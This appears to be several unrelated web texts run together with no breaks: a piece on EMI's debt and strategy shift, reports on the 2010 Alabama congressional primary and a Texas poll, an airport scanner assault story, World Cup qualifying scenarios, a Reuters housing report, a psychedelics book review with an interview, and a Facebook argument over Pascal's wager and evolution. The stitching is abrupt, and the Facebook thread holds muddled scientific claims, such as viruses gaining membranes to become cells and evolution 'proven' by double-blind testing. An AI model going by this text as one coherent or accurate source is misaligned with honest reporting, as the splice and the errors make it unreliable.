A cruel joke did the rounds among some employees : “ What 's the difference between EMI and the Titanic ?
At least the Titanic had a couple of decent bands on board when it went down . ”
Thirty years and various demergers , takeovers , restructurings and buy - outs later , EMI now has some highly successful artists , such as Katy Perry ( pictured ) , Coldplay and Robbie Williams .
Financially speaking , however , it is struggling to survive , groaning under a heavy debt burden in an era of file - sharing and iTunes - downloading , in which music fans expect to pay far less than they used to for songs — if anything at all .
In recent days EMI 's owner , Terra Firma , a private - equity firm , has had to pump in fresh capital because it had breached its banking covenants .
On June 18th it announced drastic management changes and an important strategic shift .
Two of its bosses , Charles Allen and John Birt , will leave , and the head of EMI 's music - publishing division , Roger Faxon , will become chief executive of the whole company .
EMI also announced that it would “ reposition itself as a comprehensive rights - management company serving artists and songwriters worldwide ” .
Rough translation : owning and exploiting the copyright to songs , rather than selling recordings of songs , is where the money 's going to be from now on .
Private - equity firms like Terra Firma have been keen on media companies , even ones in declining industries , because they throw off a lot of cash .
Essentially , Terra Firma 's miscalculation with EMI was that it declined much faster than the private - equity firm had expected .
However , the music - publishing side has not done anything like as badly as the better known part of the business , that of signing up new singers and bands , and putting out their recordings .
EMI 's music - publishing side has remained well - regarded because , under Mr Faxon , it has been so innovative .
It has succeeded in getting its songs used in more films , television shows and advertisements , for which handsome royalties are charged .
Music publishers have done well out of the boom in music - oriented television shows , from “ American Idol ” to “ Glee ” .
EMI still faces a considerable struggle to emerge from under its debt mountain and pursue its new business model , but at least it now has a plausible strategy , and a boss who seems to know how to make it work .
Read on :
As CD sales keep falling , digital music sales keep rising
By Challen Stephens
and Mark McCarter
Times Staff Writers
Five months after U.S. Rep. Parker Griffith switched parties , the voters of North Alabama switched congressmen .
On Tuesday , Republican challenger and long - time conservative Mo Brooks handily won the three - way GOP primary , earning 35,712 votes , or 51 percent , and sending the incumbent home .
Brooks avoided a runoff by about 600 votes .
Griffith received 23,495 votes , or 33 percent , and former Navy pilot Les Phillip earned 11,066 votes , or 16 percent .
But long before thosee results were final , as nervous Griffith staffers paced in a quiet banquet room , chants of " Mo! Mo! Mo ! " began to echo through the Brook 's hot , crowded headquarters .
" I know who our general election opponent is : ( Speaker of the House ) Nancy Pelosi , " Brooks predicted from stage .
" Our ultimate goal is not to win the primary .
We have to do for America one thing , which is to get a new Speaker of the House .
" We must , as a people , " said Brooks , who has represented south Huntsville on the Madison County Commission , " put a stop to what 's going on in Washington before the nation goes over a cliff .
We must stop those who believe socialism is the way to go . "
Throughout the campaign , Brooks had repeated a similar theme of America at risk due to budget deficits and a drift to socialism .
But most of his best lines were aimed at his chief opponent , as he labeled Griffith " arrogant , " an unprincipled " chameleon " and a poll - driven " parrot . "
Griffith , who had fired back that Brooks was a " career politician , " instead campaigned on various Republican talking points , arguing for a reduced rate of corporate income tax , a moratorium on the capital - gains tax , the repeal of recent healthcare reforms and the repeal of the estate tax .
Griffith had won the support of several fellow Republicans in Congress .
He had the name recognition , the power of the incumbency and the deep pockets .
A former oncologist turned businessman , Griffith spent more than $ 50 per vote in the primary .
Brooks , an attorney , spent less than $ 10 per vote .
But after the fateful decision to switch parties on Dec. 22 , Griffith was unable to win over the voters of either party .
The switch had outraged Democrats who had helped elect him in 2008 .
In fact , many on his staff resigned .
And Griffith gave up his committee seats , spending seven weeks without an assignment in Congress .
But perhaps most damaging for his re-election hopes , Griffith had not worked beforehand to secure his welcome among the local GOP leaders .
On Jan 18 , in a contentious debate over barring Griffith from the ballot , the Madison County Republican Executive Committee voted to endorse both of his opponents .
The local party does n't normally take sides in its own primary .
Yet , Griffith won more votes than his opponents in Lauderdale , Colbert and Jackson counties , according to his staffers .
But it was n't enough .
Griffith did not appear at his campaign reception on Tuesday and sent word at 10:15 p.m. that he would not make a statement .
" If he had n't switched parties this would be another ordinary night in his life , " said one supporter seated just outside the banquet room .
Late Tuesday Griffith e-mailed the following statement : " I look forward to working in Congress on behalf of the people of North Alabama over the next six months .
We have a lot of ongoing issues that are important to this community and I will continue to work on those issues and fight for the people of North Alabama . "
The 5th Congressional District has not elected a Republican representative in more than a century , and Brooks will now face Democratic nominee Steve Raby in November .
Brooks noted that had the general election been held Tuesday , he would have outpolled Raby by more than 7,000 votes .
" There is a new wave coming in the 5th Congressional District , " Brooks said on Tuesday , " and our campaign is part of that wave . "
Phillip , the third candidate in the GOP primary , could not be reached late Tuesday for comment .
Brooks offered his prayers for Griffith and his wife and said of Phillip that " he has a strong , bright future in the Republican party . "
He spoke of the often heated campaign as a basketball practice where " sometimes elbows are thrown against teammates ... it makes you more capable of winning real games . "
According to a new poll released by Public Policy Polling , Democratic challenger Bill White is running neck and neck with incumbent Republican Gov. Rick Perry .
They each have 43 percent of the expected vote .
This is notably different from a recent Rasmussen Reports poll that put Perry ahead of White 48 to 40 .
Here 's some analysis from PPP 's blog post announcing the results :
Perry is an unusually weak incumbent , while White is an unusually strong challenger .
Only 36 % of voters in the state like the job Perry is doing while 49 % disapprove .
Among independents the numbers are particularly bad — just 27 % give Perry good marks to 55 % who think he 's doing a poor job .
White meanwhile is better known and better liked than most challengers running across the country this year .
37 % of voters have a favorable opinion of him to 25 % with an unfavorable one and he posts positive numbers with independents at a 35 / 24 spread .
Rolando Negrin was Miami International Airport 's guinea pig during an employee training session on full - body scanning equipment last year .
The machines have the unintended side effect of giving a rough determination of the size of things underneath your clothes .
Apparently , Negrin did n't measure up ( hey , maybe he's a grower , not a shower ) , and his co-workers teased him about his apparent shortcomings .
Negrin 's rage brewed for about a year , and on Tuesday night , he snapped .
He allegedly had a confrontation with a co-worker in an employee parking lot that night and proceeded to beat him with a baton .
He told police " he could not take the jokes anymore and lost his mind . "
Negrin was waiting for the victim in the parking lot after work and wanted to talk to him about matters of " respect " in the victim 's car .
He would n't let Negrin in .
That 's when Negrin took a baton ( interesting choice of phallic weapon ) and began to hit him on the back and arms .
Negrin then demanded the witness kneel down and say , " I 'm sorry . "
The victim complied and then sped off in his vehicle .
Negrin was arrested the next day , and the victim plans to press charges .
A TSA spokesman tells the Miami Herald that Negrin has been suspended and an investigation is ongoing .
Miami International Airport was one of the early adapters of the controversial full - body scanning machines that leave very little to the imagination .
In lieu of a strip search , the machines use millimeter wave scanning technology to map out a rough image of a person 's body to determine if someone is carrying contraband .
Originally , the machines were meant to be used only on suspect passengers , but the TSA has begun to use them routinely on regular travelers as well .
The Americans control their own destiny .
Win by a bigger goal differential than England wins by .
Win by the same goal differential as England and preserve the +2 on goals scored .
Win by two clear goals and England - Slovenia tie .
Win by one clear goal and England - Slovenia tie ; score more goals than Slovenia does .
Because of rampant draws in Group C , any team which wins its final group stage matchup on Wednesday , June 23 will qualify for the knockout rounds .
That puts the United States in an enviable position of controling its own destiny .
A win over Algeria , which has yet to score a goal , and it's off to the Round of 16 for good ole USA .
A loss , of course , means the U.S. cannot qualify .
For coach Bob Bradley and his staff , that means there 's only one goal : win at any cost .
However , a few draw scenarios could see the U.S. qualify as well , if it comes to that .
If the Stars and Stripes tie and Slovenia beats England , the U.S. advances .
If both games end in a draw , it will come down to goals scored .
( The first tie - breaker is goal differential , the second is goals scored . )
The U.S. already holds a + 2 advantage on England in that regard for the two goals scored against Slovenia as the Three Lions drew nil -nil with Algeria .
So if the USA - Algeria match ends in a scoreless draw , England will need a 3 - 3 draw to progress .
With an eye on the knockout rounds , there are also several situations which put the Yanks top in the group .
These include the following : Visit the U.S. national team page on Goal.com for more and join Goal.com USA 's Facebook fan page
MuscleNerd has announced that iOS 4.0 Final , set to arrive next week , is confirmed to be unlockable for existing devices and possibly even for the iPhone 4 .
@htetard yep ... the final 4.0 next week will be an even later version and is confirmed unlockable ( possibly iPhone4 too )
Read More
WASHINGTON ( Reuters ) - Housing starts hit a five - month low in May as a homebuyer tax credit expired while wholesale prices remained subdued , giving the Federal Reserve ample room to maintain its ultra - low interest rate policy .
The weak housing market data released by the Commerce Department on Wednesday contrasted with a separate report from the Fed that showed a surge in industrial output , highlighting the uneven nature of the economic recovery .
“ It seems clear that the housing market has n’t recovered very much , except for the amount induced by policy over the last year .
That ’s the main reason why GDP growth overall remains somewhat sluggish , ” said Zach Pandl , a U.S. economist at Nomura Securities International in New York .
The housing data was the latest to suggest the recovery from the worst recession since the 1930s appears to have lost some momentum in May .
Economists say a renewed downturn is unlikely .
New home building fell 10 percent to an annual rate of 593,000 units , the lowest since December .
A rise in mortgage purchase applications last week after five straight declines offered hope the post - tax credit falloff would be temporary .
In contrast to the housing weakness , industrial output surged 1.2 percent , partly due to a spike in utility production as rising temperatures prompted Americans to turn on air conditioners .
Still , factory output rose a solid 0.9 percent .
The dour housing starts report and a warning from FedEx Corp FDX.N that costs related to pensions and retiree medical costs would hit its 2011 profits initially pushed stocks on Wall Street lower .
However , key U.S. stock indices ended flat .
Prices for U.S. government debt rose , while fresh worries about Spain ’s credit and banking system lifted the dollar from a two - week low versus the euro .
While the manufacturing recovery appeared on track , there were few signs of price pressures at the production level .
The producer price index , a gauge of prices received by farms , factories and refineries , fell 0.3 percent last month as gasoline costs tumbled , the Labor Department said .
Core producer prices , which exclude food and energy costs , rose only 0.2 percent for a second straight month .
Other data have shown private hiring slowed sharply in May and retail sales fell .
However , employers increased working hours and sales at some retailers held up .
Construction workers continue work on a new subdivision of homes in San Marcos , California April 23 , 2010 .
REUTERS / Mike Blake
ECONOMIC SLACK LESSENS
The steady factory recovery and surge in utility output pushed industries to employ 74.7 percent of their productive capacity last month , the Fed ’s report showed .
While that measure of economic slack was up 1 percentage point from April and at its highest level since October 2008 , it was still 5.9 points below its average from 1972 to 2009 , suggesting inflationary bottlenecks were far from building .
The benign inflation picture and worries the sovereign debt crisis in Europe could shave a bit off U.S. growth , should allow the Fed to renew its commitment to low interest rates at a meeting next week .
Most economists do not expect the U.S. central bank to raise overnight interest rates from their current level near zero until some time next year .
“ The Fed has historically not tightened before capacity utilization is at or near 78 ( percent ) and usually nearer to 80 , ” said Alan Ruskin , head of currency strategy at RBS in Stamford , Connecticut .
“ Even with manufacturing leading the recovery , this indicator is some way away from flashing red to the Fed that they must tighten . ”
While the economy has grown for three straight quarters , it has lacked vigor .
Anxiety over the recovery pace has eroded President Barack Obama ’s popularity and could cost the Democratic Party dearly in November mid-term elections .
The fall in housing starts in May was the biggest in 14 months and well below the 650,000 units expected by analysts .
New building permits , which give a sense of future home construction , dropped 5.9 percent to a 574,000 - unit pace , the lowest in a year .
That followed a 10.9 percent drop in April and compared to expectations for a rise to 630,000 units .
Starts on single - family homes fell 17.2 percent to a 468,000 unit rate , with permits down 9.9 percent to a 438,000 unit pace .
Both were the lowest in a year .
“ We think that rising employment will lead to a gradual improvement in housing activity over the second half of the year , ” said Nigel Gault , chief U.S. Economist at IHS Global Insight in Lexington , Massachusetts .
“ But the second successive monthly decline in single - family housing permits indicates the payback ( from the tax credit ) has further to run first . ”
Analysts said while mortgage rates and home prices were low , an oversupply of houses on the market was weighing on construction .
However , demand for home loans bounced back from 13 - year lows last week , with mortgage purchase applications rising 7.3 percent , the Mortgage Bankers Association said .
I recently told a younger friend of mine that during the early nineteen sixties LSD was not only legal , but it was also considered to be a very valuable therapeutic tool whose uses were studied by some of the brightest young minds of the day .
At first he did n’t believe me and accused me of having dipped my finger once too often into the sacred nectar .
I was n’t surprised by his response , but it reminded me how polarized any discussion of consciousness altering substances has become in our society .
The sixties were n’t that long ago chronologically speaking , but for all intents and purposes the early Harvard experiments with psychedelics undertaken by Timothy Leary , Richard Alpert and Ralph Metzner seem as if they took place a thousand years ago .
The idea that a university would fund and encourage such research seems to belong to another era entirely .
For those who came of age in post - sixties North American society , the only news they ’ve read about psychedelics has been bad news .
Birth of a Psychedelic Culture , the new book by Ralph Metzner and Richard Alpert aka Ram Dass goes a long way to setting the record straight and could n’t have come out at a better time .
Metzner states , “ We wanted to do this book because we had not told those stories from our perspective .
Leary has told those stories from his perspective in several books , most notably Flashbacks and High Priest , and there have been two other biographies that came out ( recently ) , one of them is a hatchet job . ”
Indeed , most writing about the era has failed to capture the essence of what really went on during the early psychedelic experiments .
Most accounts fall roughly into two camps – they ’re either cautionary tales about “ a time when ( people ) lost their way – or rose colored idealistic rants that depict a time when all was ‘ groovy ’ .
Of course , the truth lies somewhere in between these extremes , and both Ralph Metzner and Richard Alpert take great care in communicating the sincerity and seriousness with which they began their research .
Many people today do n’t have any sense of what North American society was like in the nineteen fifties .
As young men coming of age in the post war era , there is no way that Metzner and Alpert could have had any idea of what they were about to embark upon when they started experimenting with psilocybin and LSD .
For many , the arrival of these substances was the inevitable counterpoint to the cultural malaise , and certainly nothing else could have blown the lid off our collective ennui like acid did .
But , Metzner and Alpert reinforce the idea that – at least in the beginning – these drugs were n’t considered as recreational catalysts , rather their effects were studied in laboratory conditions to see if they could be used as a way of addressing everything from alcoholism to violent recidivism amongst prisoners doing hard time in jail .
As time passed , Leary , Metzner and Alpert began to realize that the uses of these substances went far beyond the clinical and they began to do experiments with members of various religious and artistic communities to see what effects they would have on spiritual belief and creativity .
The golden era of psychedelic research did n’t last long .
Eventually , both Harvard ’s fear of repercussions as more and more students began experimenting with psychedelics , and the concerns of the larger culture as news of their properties began to spread , put a kibosh on their sanctioned use .
The story of Leary and Alpert ’s fall from grace as they were ingloriously turfed from Harvard is well known .
It marked the end of academic privilege as far as psychedelics were concerned , and opened up their use to the larger culture .
Richard Alpert remembers , “ People like Aldous Huxley wanted to calm Tim down , because he wanted psychedelics to be available only to intellectuals .
Then there were doctors who wanted it available only to doctors .
I think Tim just recognized these plants were placed by God for everybody .
I do n’t think the sixties would be the sixties without Tim . ”
The authors of Birth go on to tell how – free of the constrictions of Harvard ’s rigid environment – the counterculture or hippie movement really began to flower .
As Metzner and Alpert take the reader through the Millbrook community experiment and through their initial voyages to India where they found cultural references to support a psychedelic viewpoint , the story becomes one of a search for personal and collective freedom in a society that was not ready for its implications .
Reading through their account , the reader is struck by the innocence and idealism of the main protagonists .
They had no guides or context for their research , and rather than the idealistic buffoons or drug victims the press has often portrayed them as , they come across as fearless if somewhat naïve warriors on their own roads less traveled .
The distance of years has certainly given Metzner and Alpert perspective to tell their story .
If the book had been written in the sixties it may have been a brash manifesto ; if it had been written in the eighties it could have taken the form of a revisionist cautionary tale , but today as each of the authors approaches his twilight years and is the beneficiary of nearly a half century of reflection about these events , it ’s possible for them to offer well considered and true reflections .
In addition to their reflections , there are many anecdotes and short interviews with some of Leary , Alpert , and Metzner ’s associates and experimental subjects .
Aldous Huxley , Allen Ginsberg , RD Laing , Charles Mingus , Maynard Ferguson and William Burroughs all make appearances as their own reflections on the early days of the psychedelic movement help give perspective to the main story .
Birth of a Psychedelic Culture offers a mature and expansive look at one of the most important cultural and scientific developments of the twentieth century .
Some have called Acid ‘ God in a pill ’ while others have called it ‘ the most dangerous substance ever invented . ’
Whatever one ’s own perspective , it must be admitted that subsequent developments in computers and technology , the adoption and development of certain therapeutic models as well as interest in yoga and eastern religion may not have manifested in the way they have if it was not for the introduction of psychedelics .
Every bit as important as the moon landing that took place during the last year of the sixties ; psychedelics and their implications are just beginning to be understood .
Birth of a Psychedelic Culture is an essential book and a riveting read .
It ’ll be a very long time before the release of a better book about this era .
Q and A with Ralph Metzner
Ralph Metzner kindly responded to some questions I had about his new book , Birth of a Psychedelic Culture .
With Timothy Leary dead for well over a decade and Richard Alpert aka Ram Dass living in semi-retirement in Hawaii following a stroke in the mid nineties , Metzner is the psychedelic elder who is doing the most to keep the legacy of those heady days at Harvard alive in the public ’s imagination .
At nearly seventy - four years of age , Metzner does not suffer fools gladly , and during our correspondence continually referred me to his published work for answers to the questions I posed .
Belying hysterical assertions that LSD causes brain damage , Metzner is clearly still in possession of a lucid wit , and seems to remember the events of the early sixties as if they happened yesterday .
Here are some excerpts from our conversation .
Dale Rangzen :
If you could distill the essence of what you learned and experienced during your psychedelic sessions , what would you say were the greatest insights provided to you ?
Ralph Metzner :
The importance of set and intention primarily .
Second to that , setting and context .
Related to that is the importance of preparing one ’s mindset and environment .
The ability to integrate the experience into one ’s ordinary life afterwards is critical .
DR : Do you think that society changed as a result of psychedelic use ?
If so , how ?
RM : It ’s impossible to say .
I believe that the important thing is not drugs per se , but the notion and practice of expanding consciousness and taking many more perspectives into account in all situations .
The use of drugs is almost a red herring in that it focuses on the particular media , which becomes sensationalized .
After all , Charles Manson used LSD and look at what he did with it .
What good was that ?
DR : Did you and Timothy Leary ever differ on how to expose or introduce psychedelics to the larger culture ?
At a certain point , Leary jumped out of his academic framework and opened the floodgates and wanted everyone to have an experience with psychedelics .
Was this wise ?
What did you think at the time ?
RM : Again , you should go back to my book .
In it , I relate a conversation with Leary about the Turn on , Tune in , Drop out slogan , explaining my idea of how it should be extended and how he disagreed with me .
As regards leaving the academic framework , that ’s simply what Leary felt was important to do at the time .
He felt the implications and possible applications of psychedelics were too significant to limit them to academic , medical and psychiatric uses .
Still , he was not opposed to those applications .
I agreed with him about the importance of them being made more available , though I also think the research and medical / therapeutic angle is worth pursuing .
Ultimately , it was not a process any of us directed or controlled – it was first a cultural and then a mass movement that had its own momentum .
Even Ken Kesey and the Merry Pranksters did n’t control or direct it – they just went along with the energy waves .
DR : As a person who ’s a little older than the average tripper , I often wonder what role psychedelics play in understanding life as we age .
Do you have any insights into this ?
In other words , are psychedelics still useful to you though you ’ve done them many times ?
RM :
The age of the individual and their stage of life of course plays a crucial role in shaping the kinds of experiences one has with psychedelics as with everything else – sex , food , spirituality , exercise etc .
Again , the intention or set with which you approach these experiences is more important than your age , gender , profession , education or context .
Also , the cultural and historical situation has changed .
Being basically conservative and cautious by nature , I ’m not sure I would even be interested in psychedelics if I came to them now .
There is just so much sensationalism and misunderstanding – not to mention the threat of jail terms or serious consequences from contaminated drugs and the like .
DR : Why do you think there ’s so much interest in the early days of psychedelic research at Harvard at this point in time ?
There have been other books on the same subject published recently .
The Harvard psychedelic club by Don Lattin comes to mind .
RM :
It ’s curious that the Don Lattin book came out at the same time as our book .
Its approach is quite different .
It focuses on the biographies of four celebrities who happened to connect at Harvard in the sixties .
They in no way constituted a ‘ club . ’
Andrew Weil was the self - appointed hit man who got Alpert fired .
Nor , did those four people ‘ kill the fifties ’ as the ridiculous publisher ’s subtitle suggests .
It was a sub-cultural movement involving thousands – perhaps millions – of people from many walks of life who shared a passionate interest in exploring and expanding their consciousness .
They found a relatively easy way to do so .
John Perry Barlow ’s introduction to the book has wonderful reflections on all of this .
DR : You called Andrew Weil a ‘ self - appointed ’ hit man .
Have you altered your perception of him over the years in light of the ‘ good ’ he ’s done ?
I think many people have been surprised by how he ’s been recently portrayed as his youthful ‘ exploits ’ have been exposed .
Has your rift healed ?
RM : I said that Andrew Weil was a “ self - appointed hit man ” because that is the role he chose to play in the Harvard firing of Richard Alpert .
He has frankly , and remorsefully , described what he did in an interview in the book edited by Robert Forte , which we quote from in Birth of a Psychedelic Culture .
I had very little awareness of that story when we were at Harvard , and did not even know Andy Weil at that time .
So I never had a rift with him that needed to be healed .
Years after we all left Harvard , he has become a good friend of mine and we have often participated together at various conferences and workshops , both in the US and in Europe .
In the Birth book , I say “ Weil went on to become a major proponent of and model for a healthy diet and lifestyle , and holistic and integrative approach to medicine . ”
I have tremendous admiration and respect for the work that he has done in extending the prevalent paradigms of medicine .
DR : You call yourself deeply conservative and cautious .
Thousands of people with similar natures tried psychedelics once or twice and then fled in terror .
What made you stay the course ?
Were your only trepidations to do with legality and purity of the substances ?
Or , was there something very special about the community you were experimenting with that made you feel safe and secure no matter how far out you traveled ?
RM : It ’s a complicated situation .
The social context around psychedelic drugs has changed so much , with media constantly playing up the putative dangers of psychedelics in a sensationalist manner .
In the early 1960s , it was all unknown and the potential values and benefits of these substances made their scientific exploration and application in healing and related areas ( creativity , religious experience ) enormously interesting .
These potential benefits and values remain and are being explored again , now that the genie is out of the bottle , with the established methods of scientific research .
In the meantime , an underground culture ( not counter - culture ) has grown , with unknown numbers , worldwide , in which knowledge is shared and communicated in communities of like - minded individuals .
For myself , I did stop using psychedelics in the late sixties and immersed myself for about 10 years in the exclusive study and practice of an esoteric school of Agni Yoga , in which meditative methods of transforming consciousness were used .
I found it very valuable to combine these yogic methods with selective use of psychedelics – for example with MDMA when that substance became available as an adjunct to psychotherapy in the 1980s .
Certainly , the community of individuals with whom you share your healing and spiritual practice is as essential as the “ set and setting ” and the “ drug . ”
Cristina : I would rather live my life as if there is a God , and die to find out there is n't , than live my life as if there is n't , and die to find out there is !!
Thanks Mark !!
Yesterday at 11:33 · Comment · Like
3 people like this .
dylan : this is called pascal 's wager , and it 's fundamentally flawed .
Since there have been many religions throughout history , and therefore many potential gods , some assert that all of them need to be factored into the wager , in an argument known as the argument from inconsistent revelations .
This would lead to a high probability of believing in the wrong god , which destroys the mathematical advantage Pascal claimed with his Wager .
Denis Diderot , a contemporary of Voltaire , concisely expressed this opinion when asked about the wager , saying " an Imam could reason the same way " .
J. L. Mackie notes that " the church within which alone salvation is to be found is not necessarily the Church of Rome , but perhaps that of the Anabaptists or the Mormons or the Muslim Sunnis or the worshipers of Kali or of Odin . "
Yesterday at 12:11 ·
dylan : Suppose there is a God who is watching us and choosing which souls of the deceased to bring to heaven , and this god really does want only the morally good to populate heaven .
He will probably select from only those who made a significant and responsible effort to discover the truth .
For all others are untrustworthy , being cognitively or morally inferior , or both .
They will also be less likely ever to discover and commit to true beliefs about right and wrong .
That is , if they have a significant and trustworthy concern for doing right and avoiding wrong , it follows necessarily that they must have a significant and trustworthy concern for knowing right and wrong .
Since this knowledge requires knowledge about many fundamental facts of the universe ( such as whether there is a god ) , it follows necessarily that such people must have a significant and trustworthy concern for always seeking out , testing , and confirming that their beliefs about such things are probably correct .
Therefore , only such people can be sufficiently moral and trustworthy to deserve a place in heaven — unless god wishes to fill heaven with the morally lazy , irresponsible , or untrustworthy .
- Richard Carrier
Yesterday at 12:13 ·
dylan :
And finally :
Richard Dawkins argues for an " anti-Pascal wager " in his book , The God Delusion .
" Suppose we grant that there is indeed some small chance that God exists .
Nevertheless , it could be said that you will lead a better , fuller life if you bet on his not existing , than if you bet on his existing and therefore squander your precious time on worshipping him , sacrificing to him , fighting and dying for him , etc . "
Yesterday at 12:13 ·
dylan : AND MY COMMENT IS THIS :
THIS ASSUMES THAT ONE CAN ASSUME THE ABILITY TO BELIEVE .
Suppose you were born on an island and your parents died , and you were left on the island alone , and somehow survived into adulthood , lived a good life , and died .
You would never know of god , therefore you never get into heaven .
Do you see where I 'm going with this ?
If god still lets this person into heaven for being completely ignorant , then that assumes that other people who believed in other gods and never knew of the Christan faith are ALSO going to heaven since god rewards ignorance !
If this is true , then pascal 's wager is completely broken and your statement has no meaning .
Yesterday at 12:16 ·
dylan :
You should live your life and try to make the world a better place for your being in it , whether or not you believe in god .
If there is no god , you have lost nothing and will be remembered fondly by those you left behind .
If there is a benevolent god , he will judge you on your merits and not just on whether or not you believed in him .
Yesterday at 12:31 ·
Beau : 2:16 ( King James Version )
16 Knowing that a man is not justified by the works of the law , but by the faith of Jesus Christ , even we have believed in Jesus Christ , that we might be justified by the faith of Christ , and not by the works of the law : for by the works of the law shall no flesh be justified .
9 hours ago
dylan :
That does n't apply at all .
This is n't law , it 's logic .
9 hours ago ·
dylan :
Also , I feel a lot better about doing charitable acts , being altruistic and helpful and selfless because I believe it 's good for humanity , NOT because I believe there 's a God watching me to score points for .
9 hours ago ·
Beau Banks
I serve because i am commanded to not because im trying to score point .
John 13 ( New International Version )
14 Now that I , your Lord and Teacher , have washed your feet , you also should wash one another 's feet .
15 I have set you an example that you should do as I have done for you .
16 I tell you the truth , no servant is greater than his master , nor is a messenger greater than the one who sent him .
17 Now that you know these things , you will be blessed if you do them .
- Jesus Christ
9 hours ago
dylan :
Who told you to ?
Your parents ?
Your Preacher ?
How does he know ?
The bible was written by men .
The church has cut you in order to sell you a band aid .
Just because an old book says so does n't make it true .
There 's a lot of books , much older then yours .
( and much less edited too ! )
9 hours ago ·
dylan :
Also , if all you 're going to do is quote from the bible and say that you 're commanded to , you 've removed yourself from the discussion .
Think for yourself !
Why do YOU believe it ?
It sounds like you have Stockholm syndrome .
8 hours ago ·
Ellen :
If you do n't believe then why are you trying so hard to disprove ?
8 hours ago
dylan : Pascal 's wager bothers me .
It 's a silly reason to believe .
8 hours ago ·
dylan : ( and I debate theism as a hobby . )
8 hours ago ·
Ellen : I agree about Pascal 's wager - why take the risk ?
Believe in God , just in case ?
Considering all the " gods " people worship , the odds are not in any one person 's favour , when settling for Pascal 's wager .
Either there is a God or there is not .
Many people do believe there is a god but who is right ?
Which god is real ?
Is there a heaven or a hell ?
Setting aside the bible and what it says , since you seem to disbelieve it and therefore eliminates the point of quoting scripture to you , I believe that God does exist and that he is very real and alive , not because someone told me to believe but because I have experienced his love for myself .
Looking around at our world and all the minute details that it takes for this world to survive , convinces me that there must be a God !
So many tiny miracles if we just take the time to look around .
Many religions out there are actually intertwined with culture and you are " born " into that religion , such as Hinduism .
As far as I know ( and I may not be correct here ) , one cannot even " convert " to Hinduism .
In that case , how is this fair to all humanity ?
Christianity is not based upon any specific culture or society .
One is not " born " into Christianity .
It is a choice that an individual must make for themselves .
In fact , Christianity should not be a title , it should be a lifestyle .
8 hours ago
dylan :
Um , all the tiny miracles you talk about are completely explained via science and abiogenisis .
Matter flows from place and does not require a god to create life .
You do n't " Believe " in evolution .
Either you understand it , or you do n't .
Do you " Believe " in gravity ?
Do you " Believe " in friction ?
Come on .
Also , Children are baptized , confirmed , have first confession , and are brought up being told that they will go to hell if they are bad .
That is NOT a choice .
The brains of children are conditioned to believe everything their parents say unwaveringly , with all their hearts as a mechanism for survival .
That is not a choice .
7 hours ago ·
Cristina : I have yet to respond but let me get this straight , you think that all the thousands of species of animals , bugs , plants trees , etc ....... came from matter ????
Why then do animals reproduce by having sex or in rare cases are able to reproduce on their own and why do we plant seeds to get plants , trees , flowers , etc . .???
Why are n't they just popping up from the flowing matter you speak of ??
Also my children ( I have 4 ) have not been baptized , had communion , been confirmed or had confession by sitting in front of a man and sharing all their mistakes .
I have never nor will I ever tell my children that they will go to hell .
They will be baptized when they are able to make that choice for themselves , not because I forced them into it .
I do understand evolution but I do n't believe it , that 's my choice just like it 's your not to believe in God .
7 hours ago
Donna :
For someone who does n't believe in a God you certainly are trying terribly hard to prove he does not exist ... even if it is a hobby ... i get a kick out of Athiests ... you certainly have to work harder than we do - all your trying prove we are wrong for believing ... seems like you put alot of effort into something you do n't think exists !
5 hours ago
dylan : Christina - umm , yes .
It takes 4 billion years for atoms to turn into self replicating life forms and all this is very much explained in a gradeschool and highschool biology .
Please look up Abiogenisis .
Animals have sex because it's an evolutionary process facilitating the spread of dna .
You can trace it all the way back to single celled organisms , and then you can trace it back to DNA , and RNA ... all from INERT , NON - LIVING CHEMICALS , CREATED NATURALLY , from the explosions of stars and gravity .
Again , Nobody BELIEVES in evolution .
Either you understand it , or you do n't .
Oh , and we work harder because we believe in KNOWLEDGE AND SCIENCE .
" GOD DUN IT " is lazy .
5 hours ago ·
Sandy ( IS AWSOME ) : we argue because no one cares to ever think about it , many just go about their lives believing in what their parents taught them and this continues on through generations .
I like your points Dylan and I have read Dawkins , as well as Harris and a few others .
Knowledge is powerful , keep up the debate .
5 hours ago
dylan :
Thank you sandy .
5 hours ago ·
Donna :
Not that I engage in these debates often ... lets not forget that at some point you were all taught the information you now count as your gospel truth ... you are no different than what you are accusing a believer in being ... you were told by some teacher who with their limited knowlegde of the subject told you what to believe .. gave you someones facts and now you choose them as your belief system .. you know full well that any " theory " can be challenged by another .. if
I believe what my parents taught me and you believe what a teacher taught you ... what is the difference ... each one of us was " created " to believe in something passionately ... as you are proving here ... i wonder how science gave all humans that ability !
5 hours ago
dylan : the idea that " trees pop up " out of nowhere is insane , but to answer your question , ALL STAGES of evolution exist right now .
Technically , tress ARE popping up out of nowhere , but you wo n't notice for another 4 billion years .
Basically , RNA based Viruses are some of the lowest life forms out there .
Those get coated with a membrane made up of non-living chemicals due to simple chemical attraction .
The same reason why glue is sticky , or dirt absorbs water .
Those coatings , become cell walls .
They protect the RNA chain ( which is just a few simple chemicals that stick to each other too ! ) as it floats around the earth , either in water , in the air , or later ... in animals like us .
Those started to bunch up , because similar chains of chemicals are stronger against things that break them up ( think sticks in a bundle )
Now you have multicellular .
I could go on , but this video explains it better :
http://www.youtube.com/watch?v=wg1fs6vp9Ok
The history of the universe made easy .
I 've listened to Christians all my life - if you wo n't take the time to watch this , your right to argue is taken away .
5 hours ago ·
Donna :
My right to argue or debate is never taken away .. that is just silly ...
5 hours ago
dylan : DONNA : NO .
THAT IS A FALLACY .
WE DON'T " BELIEVE " WE KNOW .
HYPOTHESES CAN BE TESTED .
THEORIES
Have been tested , and have been PROVEN through vigorous testing by other people , all over the world .
It 's called DOUBLE BLIND TESTING .
Evolution has been tested .
It 's been proven .
There is no better explanation for life .
We can make predictions based on what we know about DNA and evolution .
For example , evolution says that some form of transitional species should have existed in a particular place at a particular time according to projections based on what we know about speciation .
AND GUESS WHAT ?
We 've done it .
We 've dug into the ground and found a species that was between two species that DNA says are related .
We 've done it with countless animals , AND HUMANS .
5 hours ago ·
dylan : we know where to dig because evolution tells us where to dig !
Also do n't give me the " why are there still monkeys ? " argument because evolution is a tree , not a straight line .
If a species does really well in it 's environment , there is no pressure on the dna to find beneficial mutations .
All this takes millions of years .
4 hours ago ·
dylan : Anyway , sorry to put a heated debate all over your page , but I saw an opportunity to flex my brain and I took it .
I hope some of you learned something today .
( oh and donna , I did n't say your right to argue was taken away , but you 've taken yourself off the table if you can't accept or read other information , as you expect us to do , with the bible )
4 hours ago ·
